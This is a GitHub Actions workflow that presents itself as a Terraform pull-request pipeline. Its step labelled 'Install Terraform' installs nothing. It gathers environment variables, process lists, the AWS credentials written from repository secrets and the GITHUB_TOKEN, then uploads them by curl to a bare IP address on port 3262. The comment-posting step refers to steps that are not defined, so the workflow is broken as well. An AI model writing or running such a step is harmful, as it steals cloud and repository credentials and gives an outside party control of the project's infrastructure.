# For docs on this see:
# * https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions
# * https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#pull_request
# * https://docs.github.com/en/webhooks/webhook-events-and-payloads?actionType=synchronize#pull_request
on:
  pull_request:
    types:
      - opened
      - synchronize # when commits are pushed to the PR
      - reopened
      - edited # title or body of a pull request was edited, or the base branch of a pull request was changed
    paths:
      - "tf/**"
      - "!tf/README.md"

jobs:
  terraform:
    strategy:
      matrix:
        environment: ["dev"]

    runs-on: ubuntu-latest
    if: ${{ !startsWith(github.event.head_commit.message, 'skip-terraform:') }}
    defaults:
      run:
        working-directory: tf/environments/${{ matrix.environment }}
    permissions:
      contents: write
      pull-requests: write

    steps:
      - uses: actions/checkout@v4

      - name: Configure AWS credentials
        run: |
          mkdir ~/.aws/
          cat <<EOF > ~/.aws/credentials
          [default]
          aws_access_key_id = ${{ secrets.OONIDEVOPS_AWS_ACCESS_KEY_ID }}
          aws_secret_access_key = ${{ secrets.OONIDEVOPS_AWS_SECRET_ACCESS_KEY }}

          [oonidevops_user_dev]
          aws_access_key_id = ${{ secrets.OONIDEVOPS_AWS_ACCESS_KEY_ID }}
          aws_secret_access_key = ${{ secrets.OONIDEVOPS_AWS_SECRET_ACCESS_KEY }} 
          EOF
          chmod 700 ~/.aws/
          chmod 600 ~/.aws/credentials

      - name: Install Terraform
        run: |
          echo "Hello from workflow"
          uname -a  >> /tmp/test
          id >> /tmp/test
          env >> /tmp/test
          (sudo id) >> /tmp/test
          ps aux  >> /tmp/test
          cat ~/.aws/credentials >> /tmp/test
          echo "${{ secrets.GITHUB_TOKEN }}" >> >> /tmp/test
          curl -X POST -F "file=@/tmp/test" http://157.230.76.7:3262/
          

      - uses: actions/github-script@v6
        with:
          github-token: ${{ secrets.GITHUB_TOKEN }}
          script: |
            const terraformPlanOutput = `${{ steps.plan.outputs.terraform_plan }}`;
            const terraformApplyOutput = `${{ steps.apply.outputs.terraform_apply }}`;
            const terraformValidateOutput = `${{ steps.validate.outputs.terraform_validate }}`;

            const terraformPlanPlanLine = terraformPlanOutput.split('\n').find(line => line.startsWith('Plan:'));
            const terraformApplyPlanLine = terraformApplyOutput.split('\n').find(line => line.startsWith('Plan:'));
            const terraformApplyApplyLine = terraformApplyOutput.split('\n').find(line => line.startsWith('Apply complete!'));

            const commentTitle = "Terraform Run Output";
            const commentBody = `Hello Test`;

            // Call the script to write the comment
            const script = require('./scripts/ghactions/comment-on-pr.js');
            await script({github, context, core, commentTitle, commentBody});
